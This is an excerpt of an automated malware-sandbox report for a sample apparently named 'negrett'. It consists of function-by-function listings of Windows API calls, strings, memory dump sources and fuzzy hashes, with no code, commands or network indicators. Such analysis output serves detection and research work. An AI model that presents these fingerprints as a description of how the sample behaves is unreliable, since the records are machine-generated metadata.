Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 5da1d15b9768441fdb1e644853fe1bf14fadf3ed1f4a3becb67e7cee39f9dd74
Instruction ID: 2907a063c806f71777b03431a96247160288e4b8a262cf5f149facc723ff49c2
Opcode Fuzzy Hash: 5da1d15b9768441fdb1e644853fe1bf14fadf3ed1f4a3becb67e7cee39f9dd74
Instruction Fuzzy Hash: 34419334A00219ABCF10DF68C885A9EBBF5FF44324F2481E5E915AB352DB35EA15CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00BA2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00BA2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00BA2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00BA2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00BA2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00BA2EF1
SetWindowLongW.USER32 ref: 00BA2F0B

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 769f8de49fcd0a71e1dbff2443922eeb292016ad6b78b86d6b822f564c919c8b
Instruction ID: d5ebfa99201133ed28c61614981bb0d3409d0cedfe058215086e5b306babfe80
Opcode Fuzzy Hash: 769f8de49fcd0a71e1dbff2443922eeb292016ad6b78b86d6b822f564c919c8b
Instruction Fuzzy Hash: 1A31F234608290AFEB21CF5CDD85F693BE1EB9B710F2501A4F9008F2B2CB71A881DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B804D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B804F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B8052E

Strings

nul, xrefs: 00B80567

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: e78fcf56a305ceba59ccb12f56802a185b3e8d48790f2b80e977c5ffa0fd8e5a
Instruction ID: 0aa5dd803e5e287789994b230eaacacebe88ce73468c8988aa1a938afbb547d2
Opcode Fuzzy Hash: e78fcf56a305ceba59ccb12f56802a185b3e8d48790f2b80e977c5ffa0fd8e5a
Instruction Fuzzy Hash: 5A217E71610305AFDB20BF29D885A9A7BF4EF557A4F204A59E8A1D72F0DB709948CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00B805A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B805C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B80601

Strings

nul, xrefs: 00B80639

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 458b5f1d3407380efb73d2f3a14366a797c68d8163ae8102fadbc7f3bcffa658
Instruction ID: 85599b3c8c39fcc8131dc43df131f6972b3186e5c21fc5f532057cfd372473d9
Opcode Fuzzy Hash: 458b5f1d3407380efb73d2f3a14366a797c68d8163ae8102fadbc7f3bcffa658
Instruction Fuzzy Hash: 27216D755103059FDB60BF69C845A9A77E4EF967A0F200B59E8A1E72F0EB709864CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00BA40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1600E: CreateWindowExW.USER32 ref: 00B1604C
Part of subcall function 00B1600E: GetStockObject.GDI32(00000011), ref: 00B16060
Part of subcall function 00B1600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00BA4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00BA411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00BA412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00BA4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00BA4145

Strings

Msctls_Progress32, xrefs: 00BA40E3

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: bef7fce1d17e8f80b4549c2b5910303f1f6f29f040b27925a33b8d6bced63bf2
Instruction ID: 781c27a609d463f13d03cb33d36c0c48183ae36223c46c82c55d65d3a657a917
Opcode Fuzzy Hash: bef7fce1d17e8f80b4549c2b5910303f1f6f29f040b27925a33b8d6bced63bf2
Instruction Fuzzy Hash: 5611B2B2140219BEEF118F64CC86EE77F9DEF09798F004111BA18A6150CBB29C61DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 02A0CBDF Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 02A0CBA3: _free.LIBCMT ref: 02A0CBCC

_free.LIBCMT ref: 02A0CC2D
_free.LIBCMT ref: 02A0CC38
_free.LIBCMT ref: 02A0CC43
_free.LIBCMT ref: 02A0CC97
_free.LIBCMT ref: 02A0CCA2
_free.LIBCMT ref: 02A0CCAD
_free.LIBCMT ref: 02A0CCB8

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 1f10025e0db3289fbeb982eee47658dbbdbdb7e807beed3d3ea760ef957ddd8c
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 44113A715C0B04AAD620BBB0EE85FCB7BDFAF02B10F400D16A29DA60E0DE65F5069A50

Uniqueness

Uniqueness Score: -1.00%

Function 00B8096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(00DDA3C0,00DDA3C0), ref: 00B8097B
EnterCriticalSection.KERNEL32(00DDA3A0,00000000), ref: 00B8098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 00B8099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B809A9
CloseHandle.KERNEL32(00000000), ref: 00B809B8
InterlockedExchange.KERNEL32(00DDA3C0,000001F6), ref: 00B809C8
LeaveCriticalSection.KERNEL32(00DDA3A0), ref: 00B809CF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: fac32b2450073f99f489d891fd651bfe641534143db3f886bbdf102193b4d9c3
Instruction ID: 7d928dcb70e2ab612f7a2da57c0cbec770d3ba463e65403cf14ac8c6fc7e2e26
Opcode Fuzzy Hash: fac32b2450073f99f489d891fd651bfe641534143db3f886bbdf102193b4d9c3
Instruction Fuzzy Hash: E0F01932542A02BBD7416BA4EE8ABD6BA69FF02742F502025F202928B0CF749465CF90

Uniqueness

Uniqueness Score: -1.00%

Function 029FF5B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 029FF4BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029FF4D6
__allrem.LIBCMT ref: 029FF4ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029FF50B
__allrem.LIBCMT ref: 029FF522
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029FF540

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: dec9c9c9343fba6b870ff204ea54816c1b74590be1631993155b6b7fd79f38ed
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: FA811872A407069BD7E49E69DC80B6A73EEEF40774F14452AE725D7AC0EBB4D9008F50

Uniqueness

Uniqueness Score: -1.00%

Function 00B401B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00B400BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B400D6
__allrem.LIBCMT ref: 00B400ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4010B
__allrem.LIBCMT ref: 00B40122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B40140

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 143ce8090f3cb7eec46dbea6ea6d9b33fb78c8882be4a9ca787452ffdff34507
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 7481E671A117069BE720BF69CC41B6B73E9EF51324F2445BAFA51D7281E770DA00AB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B807EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00B8080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B80847
EnterCriticalSection.KERNEL32(?), ref: 00B80863
LeaveCriticalSection.KERNEL32(?), ref: 00B808DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B808F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00B80921

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 913df0edd0dcc22cf3bf58cbbb4e51f53398b0376ad0aa00c33e77ab0f9ac959
Instruction ID: 9fd34fe90cbfd6fa16b60566697a2e19fd08d2e36d0e138641cc99545a3fe1d8
Opcode Fuzzy Hash: 913df0edd0dcc22cf3bf58cbbb4e51f53398b0376ad0aa00c33e77ab0f9ac959
Instruction Fuzzy Hash: EB416B71A10205EBDF15AF54DC85AAAB7B8FF04310F1440B9ED04AB2A7DB30DE64DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BA824C
EnableWindow.USER32(00000000,00000000), ref: 00BA8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 00BA82D1
ShowWindow.USER32(00000000,00000004), ref: 00BA82E5
EnableWindow.USER32(00000000,00000001), ref: 00BA830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00BA832F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: ffd5bcd36fa9d5a6ad9dba2ef82fdd979131b40e6979f6feadda633db085b243
Instruction ID: 79e165a555bd99810542fef9a81736015ef86ef7c9ef42997015faf39fce6557
Opcode Fuzzy Hash: ffd5bcd36fa9d5a6ad9dba2ef82fdd979131b40e6979f6feadda633db085b243
Instruction Fuzzy Hash: CB418134605644EFDF26CF19D899BA47BE0FB4B714F1841E9E6484F6A2CB31A851CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00B74C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00B74C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B74CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B74CEA
_wcslen.LIBCMT ref: 00B74D08
CharUpperBuffW.USER32(00000000,00000000), ref: 00B74D10
_wcsstr.LIBVCRUNTIME ref: 00B74D1A

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: a27d89363729ec6e4e6f583f9b6394e7a36d0baa0671925d628ebc0860d2c5c1
Instruction ID: c31d8b8f5f5486cb46e961748fcaf7ab4b802f252a2753ef841c50686c184463
Opcode Fuzzy Hash: a27d89363729ec6e4e6f583f9b6394e7a36d0baa0671925d628ebc0860d2c5c1
Instruction Fuzzy Hash: 5821D731204215BBEB269B39AC4AE7B7FECDF46751F1080B9F809DB191EF61DC0096A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B42D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B45686,00B53CD6,?,00000000,?,00B45B6A,?,?,?,?,?,00B3E6D1,?,00BD8A48), ref: 00B42D78
_free.LIBCMT ref: 00B42DAB
_free.LIBCMT ref: 00B42DD3
SetLastError.KERNEL32(00000000,?,?,?,?,00B3E6D1,?,00BD8A48,00000010,00B14F4A,?,?,00000000,00B53CD6), ref: 00B42DE0
SetLastError.KERNEL32(00000000,?,?,?,?,00B3E6D1,?,00BD8A48,00000010,00B14F4A,?,?,00000000,00B53CD6), ref: 00B42DEC
_abort.LIBCMT ref: 00B42DF2

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 0a26a21cc662ae4df9cf6d39baa5ffb60314699eaeeaaba81f2777c95a5e4aed
Instruction ID: f17b6707fd4ca93e628d46fdcd40011848e2b5f62cfd42f91b9a45687f5889bf
Opcode Fuzzy Hash: 0a26a21cc662ae4df9cf6d39baa5ffb60314699eaeeaaba81f2777c95a5e4aed
Instruction Fuzzy Hash: B9F0A435905A0137D6126739AC0AB1A2AE9EFC27A1B6445B9F824932A2EF748B017260

Uniqueness

Uniqueness Score: -1.00%

Function 00BA8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00B29639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00B29693
Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296A2
Part of subcall function 00B29639: BeginPath.GDI32(?), ref: 00B296B9
Part of subcall function 00B29639: SelectObject.GDI32(?,00000000), ref: 00B296E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00BA8A4E
LineTo.GDI32(?,00000003,00000000), ref: 00BA8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00BA8A70
LineTo.GDI32(?,00000000,00000003), ref: 00BA8A80
EndPath.GDI32(?), ref: 00BA8A90
StrokePath.GDI32(?), ref: 00BA8AA0

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 38bdf5f1d90735b002ef17f19ba8ffeb12e75546e068a3889e8b7a4b650ed532
Instruction ID: 7dea3e6a1e0d20900c207256d02b7812e019cc9bf839de5f5c6e38fe3dacc85e
Opcode Fuzzy Hash: 38bdf5f1d90735b002ef17f19ba8ffeb12e75546e068a3889e8b7a4b650ed532
Instruction Fuzzy Hash: 1611177600414CFFEF129F94DC89EAA7FACEB09350F008062BA199A1A1CB719D55DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B7EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00B7EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B7EB46
GetWindowThreadProcessId.USER32(?,?), ref: 00B7EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B7EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B7EB6E
CloseHandle.KERNEL32(00000000), ref: 00B7EB75

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 95d4c37fe6c92bd85151441686b730f378876021324e64d7af0604f1bdbc7a61
Instruction ID: ed54e271e3c6188bb72424dfe6fe8e66c455dbc1e73f2609c1366ee50d9dfe09
Opcode Fuzzy Hash: 95d4c37fe6c92bd85151441686b730f378876021324e64d7af0604f1bdbc7a61
Instruction Fuzzy Hash: BFF01772240158BBE6219B669C0EEAF3E7CEFCBB11F004159F611E2191EBA05A0186B5

Uniqueness

Uniqueness Score: -1.00%

Function 029DAFE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 029DB2B3

Strings

D%MD%M, xrefs: 029DB0A5
D%M, xrefs: 029DB0A2
D%M, xrefs: 029DB29A
D%M, xrefs: 029DB1ED, 029DB191, 029DB11B

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%M$D%M$D%M$D%MD%M
API String ID: 1385522511-4071987705
Opcode ID: 704af88bb10ac0a95ef641293cb67e0680fab3b8c6544be95fb9a40e23f24687
Instruction ID: 49534c78acd373a65d61dfc6bbffe2f0f439de26731ba967d2927ba78928f2fe
Opcode Fuzzy Hash: 704af88bb10ac0a95ef641293cb67e0680fab3b8c6544be95fb9a40e23f24687
Instruction Fuzzy Hash: 4B917B75A0020ADFCB18CF98C4A0AAEB7F1FF58318F65856ED951A7350E731E981DB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A56F7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 029D90B3: _wcslen.LIBCMT ref: 029D90BD

Part of subcall function 029EF4A3: __onexit.LIBCMT ref: 029EF4A9

__Init_thread_footer.LIBCMT ref: 02A56FFB

Strings

Gp#M, xrefs: 02A57096
Gp#M, xrefs: 02A570D4, 02A57173, 02A57105, 02A57205
p#M, xrefs: 02A5715C, 02A57050
5, xrefs: 02A57078

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Init_thread_footer__onexit_wcslen
String ID: 5$Gp#M$Gp#M$p#M
API String ID: 1352291845-2426839514
Opcode ID: 52af77334cb74d662cbee44ec2f3bb6619df7e121b38913d574f9a33a2bb1dd2
Instruction ID: 63a85d3148c779b9f3f6b731d22d41f7b15abd93612dab810415700411694064
Opcode Fuzzy Hash: 52af77334cb74d662cbee44ec2f3bb6619df7e121b38913d574f9a33a2bb1dd2
Instruction Fuzzy Hash: 66917B70A00219EFCB15EF94D990DAEB7B6FF49304F10805AEC06AB2A1DB71AE45CB51

Uniqueness

Uniqueness Score: -1.00%

